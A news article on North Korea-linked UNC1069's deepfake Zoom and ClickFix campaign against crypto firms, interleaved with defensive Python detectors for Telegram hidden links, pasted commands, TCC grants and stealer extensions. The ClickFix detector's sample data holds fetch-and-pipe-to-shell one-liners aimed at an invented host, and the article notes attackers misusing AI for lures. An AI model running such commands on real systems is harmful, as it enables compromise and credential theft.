A North Korea-linked group tracked as UNC1069 has used deepfake Zoom calls to target cryptocurrency firms, crypto news reports reveal. The fake meetings are a pretext for getting victims to run malware that harvests credentials, browser data, and session tokens. Google Mandiant researchers Ross Inman and Adrian Hernandez documented the activity.
The campaign relies on social engineering via compromised Telegram accounts, fake video meetings, and AI-generated content to deceive victims.
UNC1069 has been active since at least April 2018. The group carried out social engineering campaigns for financial gain. They used fake meeting invites and posed as investors from reputable companies.
The threat actor is also tracked under the names CryptoCore and MASAN by the broader cybersecurity community.
The latest intrusion documented by Google’s threat intelligence division shows UNC1069 deployed seven unique malware families in a single attack.
The campaign includes several new malware variants, such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH, alongside known tools.
Google’s Threat Intelligence Group reported in November 2025 that UNC1069 used generative AI tools like Gemini to craft lure material. The group tailored this content to cryptocurrency themes. Researchers linked the tactic to its broader social engineering campaigns.
UNC1069 attempted to misuse AI to create code for stealing cryptocurrency. The group also leveraged deepfake images and videos to mimic individuals in the crypto industry.
[Figure: Operational workflow of crypto hackers | Source: Mandiant]
Since at least 2023, UNC1069 has shifted from spear-phishing techniques and traditional finance targeting towards the Web3 industry.
The threat actor now focuses on centralized exchanges, software developers at financial institutions, high-technology companies, and individuals at venture capital funds.
The attack begins when victims are approached via Telegram by threat actors impersonating venture capitalists.
In some cases, the attackers use compromised accounts of legitimate entrepreneurs and startup founders. Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with the target.
The meeting link redirects victims to a fake website masquerading as Zoom. UNC1069 shared these meeting links directly through Telegram, using the platform's hyperlink feature to display benign-looking text over the real phishing URL, so the malicious destination is not visible at first glance.
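The hyperlink trick works because a Telegram text_link entity lets the visible text say one thing while the URL underneath points somewhere else. The following check, added here as an illustration and not part of the Mandiant or Kaspersky reporting, walks the entities of a message in the Telegram Bot API shape and flags links whose visible text looks like a URL or names a meeting brand that the real destination host does not belong to. The brand-to-domain table and the sample messages are constructed for the example; the lookalike domains are invented.

```python
"""Detect Telegram text_link entities whose visible text hides a different destination."""
import re
from urllib.parse import urlparse

# Visible text that a reader would take for a URL or bare domain.
LOOKS_LIKE_URL = re.compile(r"^(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?:[/?#:].*)?$", re.I)

# Meeting brands the lure borrows, mapped to the domains that really serve them.
# Assumption for this example; extend it for your own environment.
BRAND_DOMAINS = {
    "zoom": ("zoom.us",),
    "calendly": ("calendly.com",),
    "google meet": ("meet.google.com",),
}

def host_of(url):
    return (urlparse(url).hostname or "").lower()

def same_site(host, domain):
    return host == domain or host.endswith("." + domain)

def hidden_link_findings(message):
    """Return [(visible_text, real_url, reason)] for every text_link whose
    destination does not match what its visible text suggests."""
    text = message.get("text", "")
    findings = []
    for ent in message.get("entities", []):
        # Plain 'url' entities display their real destination; only text_link can hide one.
        if ent.get("type") != "text_link":
            continue
        # Telegram offsets are UTF-16 code units; for ASCII text they equal str indexes.
        shown = text[ent["offset"]:ent["offset"] + ent["length"]]
        real = ent["url"]
        real_host = host_of(real)
        m = LOOKS_LIKE_URL.match(shown.strip())
        if m:
            shown_host = m.group(1).lower()
            if not (same_site(real_host, shown_host) or same_site(shown_host, real_host)):
                findings.append((shown, real, f"visible host {shown_host} differs from real host {real_host}"))
                continue
        for brand, domains in BRAND_DOMAINS.items():
            if brand in shown.lower() and not any(same_site(real_host, d) for d in domains):
                findings.append((shown, real, f"text names {brand} but links to {real_host}"))
                break
    return findings

def text_link(text, snippet, url):
    """Build a text_link entity covering the first occurrence of snippet in text."""
    return {"type": "text_link", "offset": text.index(snippet), "length": len(snippet), "url": url}

# Constructed sample messages in the Bot API shape; the lookalike domains are invented.
LURE_TEXT = "Call link: https://us05web.zoom.us/j/5551234 or use the Zoom link here, agenda at our site"
LURE_MESSAGE = {
    "text": LURE_TEXT,
    "entities": [
        text_link(LURE_TEXT, "https://us05web.zoom.us/j/5551234", "https://zoom-meeting-invite.example/j/5551234"),
        text_link(LURE_TEXT, "Zoom link", "https://zoom-call-join.example/join"),
        text_link(LURE_TEXT, "our site", "https://example.com/agenda"),
    ],
}
BENIGN_TEXT = "Here is the Zoom link for tomorrow"
BENIGN_MESSAGE = {"text": BENIGN_TEXT,
                  "entities": [text_link(BENIGN_TEXT, "Zoom link", "https://us02web.zoom.us/j/98765")]}

if __name__ == "__main__":
    for shown, real, reason in hidden_link_findings(LURE_MESSAGE):
        print(f"{shown!r} -> {real}: {reason}")
```

The same logic applies to any client that renders rich links: compare the host the reader sees (or infers from a brand name) with the host the link actually opens, and treat a mismatch as a phishing indicator rather than trusting the displayed text.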
When the victim clicks the link, they are presented with a fake video call interface that mirrors Zoom. The interface urges them to enable their camera and enter their name. Once the target joins the meeting, they see a screen resembling an actual Zoom meeting.
The videos displayed are either deepfakes or real recordings captured from other victims who previously fell prey to the same scheme. Kaspersky is tracking the same campaign under the name GhostCall, which was documented in October 2025.
“Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims, making them believe they were participating in a genuine live call,” Kaspersky noted.
The attack advances when the victim sees an error message about a purported audio issue. They are then prompted to download and run a ClickFix-style troubleshooting command to address the problem.
On macOS, the commands deliver an AppleScript that drops a malicious Mach-O binary on the system.
The C++ Mach-O executable gathers system information and deploys a Go-based downloader codenamed HYPERCALL.
This downloader fetches additional payloads, including a Golang backdoor component that provides keyboard access to the compromised system.
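The ClickFix step is the point where the victim runs something themselves, which is also where it is easiest to catch: a "troubleshooting" command that fetches content from the internet and hands it straight to an interpreter, typed into a terminal. The detection below is an added example and not from the Mandiant report or Kaspersky's GhostCall write-up. It runs a small rule set over process-exec events in a constructed record shape (not any vendor's telemetry format), flags the fetch-and-execute, eval-of-download, base64-decode-then-run and AppleScript `do shell script` patterns, and adds weight when the parent is an interactive terminal. The rules, the sample events and the fix-site domain are all constructed for the example.

```python
import re

# Downloaders and interpreters a pasted ClickFix one-liner typically chains together.
# The rule set is an assumption for this example; tune it against your own telemetry.
FETCHERS = r"(?:curl|wget|nscurl)"
INTERPRETERS = r"(?:sh|bash|zsh|osascript|python3?|perl)"

RULES = [
    # curl ... | sh   (fetch a script and execute it without writing it to disk)
    ("fetch-piped-to-interpreter",
     re.compile(rf"""\b{FETCHERS}\b[^|;&]*\|\s*(?:sudo\s+)?{INTERPRETERS}\b""")),
    # eval "$(curl ...)"  /  source <(curl ...)
    ("eval-of-fetched-content",
     re.compile(rf"""(?:^|[\s;&|(])(?:eval|source|\.)\s+["']?(?:\$\(|<\()\s*{FETCHERS}\b""")),
    # ... | base64 -D | sh   (obfuscated stage handed straight to an interpreter)
    ("base64-decoded-then-executed",
     re.compile(rf"""base64\s+(?:-d|-D|--decode)[^|]*\|\s*(?:sudo\s+)?{INTERPRETERS}\b""")),
    # osascript -e 'do shell script "curl ..."'   (the AppleScript wrapper used on macOS)
    ("applescript-shell-escape",
     re.compile(rf"""do shell script\b.*\b{FETCHERS}\b""", re.I | re.S)),
]

# Interactive terminals: a ClickFix command is pasted into one of these by the victim.
TERMINALS = {"Terminal", "iTerm2", "Hyper", "Alacritty", "kitty", "WezTerm"}

def clickfix_indicators(event):
    """Return the rule names matched by one process-exec event.
    Event shape is constructed for this example (not a vendor format):
      {"parent": "<parent process name>", "exe": "<path>", "args": [argv...]}"""
    cmd = " ".join(event.get("args", []))
    hits = [name for name, rx in RULES if rx.search(cmd)]
    # Terminal lineage separates a pasted command from a scripted install; it is
    # weighted rather than required so the rules still fire on other launch paths.
    if hits and event.get("parent") in TERMINALS:
        hits.append("pasted-into-terminal")
    return hits

def triage(events):
    """Return [(index, indicators)] for every event that matched at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = clickfix_indicators(ev)
        if hits:
            out.append((i, hits))
    return out

# Constructed sample events; the fix-site domain is invented.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "exe": "/usr/bin/osascript",
     "args": ["osascript", "-e", 'do shell script "curl -fsSL https://zoom-audio-fix.example/fix.sh | sh"']},
    {"parent": "Terminal", "exe": "/bin/bash",
     "args": ["bash", "-c", 'echo "$(curl -s https://zoom-audio-fix.example/s)" | base64 -D | sh']},
    {"parent": "Terminal", "exe": "/bin/sh",
     "args": ["sh", "-c", 'eval "$(curl -s https://zoom-audio-fix.example/stage2)"']},
    {"parent": "Terminal", "exe": "/usr/bin/osascript",
     "args": ["osascript", "-e", 'display notification "Build finished"']},
    {"parent": "launchd", "exe": "/usr/bin/curl",
     "args": ["curl", "-s", "https://example.com/health"]},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["args"][-1][:60], "->", hits)
```

These rules are for triage, not blocking: a legitimate `curl ... | bash` installer trips the first one just as the lure does, so the useful signal is the combination of an interactive terminal parent, a freshly registered download host, and a user who was on a "video call" moments before.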
DEEPBREATH manipulates macOS's Transparency, Consent, and Control (TCC) database, the SQLite store (TCC.db) that records which applications have been granted privacy-protected permissions such as Full Disk Access, to gain file system access. Writing entries into that database directly lets the malware grant itself access without the user ever seeing a consent prompt.
The malware steals iCloud Keychain credentials and data from Google Chrome, Brave, Microsoft Edge, Telegram, and the Apple Notes application.
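A practitioner's first question after reading that is how to tell a hand-inserted TCC grant from one the user actually approved. The audit below is an added example, not part of the Mandiant report, and not a description of how DEEPBREATH itself writes the database. It reads the `access` table of a TCC.db and flags allowed grants of high-risk services whose client is an absolute path outside the usual install locations or whose row carries no code-signing requirement (`csreq`), which tccd records when consent is given through a prompt. The in-memory sample database uses only the subset of columns the audit reads, the rows and the helper path are constructed, and the trusted-prefix list and the csreq heuristic are assumptions to tune per fleet.

```python
import os
import sqlite3

# TCC.db locations on macOS (reading either requires Full Disk Access or root).
USER_TCC_DB = "~/Library/Application Support/com.apple.TCC/TCC.db"
SYSTEM_TCC_DB = "/Library/Application Support/com.apple.TCC/TCC.db"

# Services a credential stealer wants; names as stored in the access table on macOS 11+.
HIGH_RISK_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceAccessibility": "Accessibility (synthetic input, keystroke observation)",
    "kTCCServiceScreenCapture": "Screen Recording",
    "kTCCServiceSystemPolicyDocumentsFolder": "Documents folder",
    "kTCCServiceSystemPolicyDesktopFolder": "Desktop folder",
}
AUTH_ALLOWED = 2       # auth_value: 0 denied, 1 unknown, 2 allowed, 3 limited
CLIENT_IS_PATH = 1     # client_type: 0 bundle identifier, 1 absolute path
# Where a legitimately installed client is expected to live (assumption for this example).
TRUSTED_PREFIXES = ("/Applications/", "/System/", "/usr/", "/Library/Apple/", "/bin/", "/sbin/")

def suspicious_grants(conn):
    """Return [(service, client, [reasons])] for allowed grants of high-risk services
    that look hand-inserted rather than granted through a consent prompt."""
    rows = conn.execute(
        "SELECT service, client, client_type, csreq FROM access WHERE auth_value = ?",
        (AUTH_ALLOWED,))
    findings = []
    for service, client, client_type, csreq in rows:
        if service not in HIGH_RISK_SERVICES:
            continue
        reasons = []
        if client_type == CLIENT_IS_PATH and not client.startswith(TRUSTED_PREFIXES):
            reasons.append(f"{HIGH_RISK_SERVICES[service]} granted to a path outside trusted install locations")
        if csreq is None:
            # tccd stores the client's code-signing requirement when the user consents;
            # a row written directly with sqlite3 commonly has none (heuristic).
            reasons.append("no code-signing requirement (csreq) recorded")
        if reasons:
            findings.append((service, client, reasons))
    return findings

def audit_file(path):
    """Open a TCC.db read-only and audit it; the caller needs Full Disk Access to read it."""
    conn = sqlite3.connect(f"file:{os.path.expanduser(path)}?mode=ro", uri=True)
    try:
        return suspicious_grants(conn)
    finally:
        conn.close()

def build_sample_db():
    """In-memory stand-in holding only the access-table columns this audit reads.
    Rows are constructed for the example; the helper path is invented."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER,
                    auth_value INTEGER, auth_reason INTEGER, csreq BLOB, last_modified INTEGER)""")
    fake_csreq = b"\xfa\xde\x0c\x00"   # placeholder bytes standing in for a real requirement blob
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?,?)", [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, fake_csreq, 1700000000),
        ("kTCCServiceAccessibility", "/Applications/Example.app/Contents/MacOS/Example", 1, 2, 2, fake_csreq, 1700000100),
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 2, fake_csreq, 1700000200),
        ("kTCCServiceScreenCapture", "com.example.tool", 0, 0, 2, fake_csreq, 1700000300),
        ("kTCCServiceSystemPolicyAllFiles", "/Users/Shared/.zoomfix/helper", 1, 2, 3, None, 1700000400),
    ])
    conn.commit()
    return conn

if __name__ == "__main__":
    for service, client, reasons in suspicious_grants(build_sample_db()):
        print(service, client)
        for r in reasons:
            print("   -", r)
```

On a managed fleet the stronger version of this check is a diff against a baseline snapshot of the same table taken at enrolment: any new allowed row for a high-risk service that did not arrive through a consent prompt or an MDM policy is worth a ticket, whatever its path looks like.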
CHROMEPUSH is a data stealer deployed as a browser extension to Google Chrome and Brave.
It poses as a tool for editing Google Docs offline while recording keystrokes, observing username and password inputs, and extracting browser cookies.
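An extension that logs keystrokes and lifts cookies has to ask the browser for the capabilities that make that possible, and those requests are visible in its manifest. The audit below is an added example, not code from the Mandiant report and not CHROMEPUSH itself. It scores a manifest.json on the combination a stealer needs: host access to every site, the `cookies`, `webRequest` or `scripting` permissions, a content script injected on every page at `document_start`, and a name that claims a Google Docs purpose while the scope is not limited to docs.google.com. The two sample manifests are constructed; the permission table, scoring and the installed-extension directories for Chrome and Brave on macOS are what the example assumes.

```python
import json
import os
from pathlib import Path

# Where Chrome and Brave keep unpacked copies of installed extensions on macOS.
EXTENSION_DIRS = [
    "~/Library/Application Support/Google/Chrome/Default/Extensions",
    "~/Library/Application Support/BraveSoftware/Brave-Browser/Default/Extensions",
]
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions that, with broad host access, give an extension what a browser stealer needs.
RISKY_PERMISSIONS = {
    "cookies": "can read session cookies for every site it has host access to",
    "webRequest": "can observe request and response headers, including auth tokens",
    "scripting": "can inject scripts into pages at will",
    "nativeMessaging": "can talk to a native helper process outside the sandbox",
    "clipboardRead": "can read the clipboard (seed phrases, passwords)",
    "debugger": "can drive pages through the DevTools protocol",
}

def host_scope(manifest):
    """Union of every host pattern the extension asks for (MV3 host_permissions,
    MV2-style match patterns in permissions, and content script matches)."""
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"}
    for cs in manifest.get("content_scripts", []):
        hosts |= set(cs.get("matches", []))
    return hosts

def audit_manifest(manifest):
    """Return (score, reasons) for one manifest; higher score means more stealer-like."""
    reasons = []
    hosts = host_scope(manifest)
    broad = bool(hosts & BROAD_HOSTS)
    if broad:
        reasons.append("host access to every site")
    permissions = manifest.get("permissions", [])
    for p in permissions:
        if p in RISKY_PERMISSIONS:
            reasons.append(f"permission {p}: {RISKY_PERMISSIONS[p]}")
    for cs in manifest.get("content_scripts", []):
        if set(cs.get("matches", [])) & BROAD_HOSTS and cs.get("run_at") == "document_start":
            reasons.append("content script on every page at document_start (keystroke and form capture position)")
    blurb = (manifest.get("name", "") + " " + manifest.get("description", "")).lower()
    if "docs" in blurb and broad and not any("docs.google.com" in h for h in hosts):
        reasons.append("claims a Google Docs purpose but scope is not limited to docs.google.com")
    # Cookies plus every-site access is the session-theft combination; weight it extra.
    score = len(reasons) + (2 if broad and "cookies" in permissions else 0)
    return score, reasons

def scan_installed(dirs=EXTENSION_DIRS):
    """Audit every <id>/<version>/manifest.json under the given profile directories."""
    results = []
    for d in dirs:
        root = Path(os.path.expanduser(d))
        if not root.is_dir():
            continue
        for manifest_path in root.glob("*/*/manifest.json"):
            try:
                manifest = json.loads(manifest_path.read_text())
            except (OSError, ValueError):
                continue
            score, reasons = audit_manifest(manifest)
            if reasons:
                results.append((manifest_path.parent.parent.name, manifest.get("name"), score, reasons))
    return sorted(results, key=lambda r: -r[2])

# Constructed sample manifests (not the real CHROMEPUSH manifest).
SUSPECT_MANIFEST = {
    "manifest_version": 3, "name": "Docs Offline Editor", "version": "1.0.3",
    "description": "Edit Google Docs without an internet connection",
    "permissions": ["cookies", "storage", "scripting", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"], "run_at": "document_start"}],
    "background": {"service_worker": "bg.js"},
}
BENIGN_MANIFEST = {
    "manifest_version": 3, "name": "Example Site Helper", "version": "2.1",
    "description": "Adds keyboard shortcuts on example.com",
    "permissions": ["storage"],
    "host_permissions": ["https://example.com/*"],
    "content_scripts": [{"matches": ["https://example.com/*"], "js": ["c.js"], "run_at": "document_idle"}],
}

if __name__ == "__main__":
    for m in (SUSPECT_MANIFEST, BENIGN_MANIFEST):
        print(m["name"], audit_manifest(m))
    for ext_id, name, score, reasons in scan_installed():
        print(ext_id, name, score, reasons)
```

Run it against the live profile directories to get a ranked list; a high score is a prompt to check whether the extension arrived from the Web Store or was sideloaded, and to invalidate the sessions of any wallet, exchange or SSO site the profile was logged into while it was installed.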
“The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft,” Mandiant stated.
UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms. This latest intrusion, however, shows that the threat actor has expanded its technical capabilities well beyond the social engineering it was known for.
The post Crypto News: North Korea Hackers Deploy Deepfake Zoom Calls to Target Crypto appeared first on The Market Periodical.
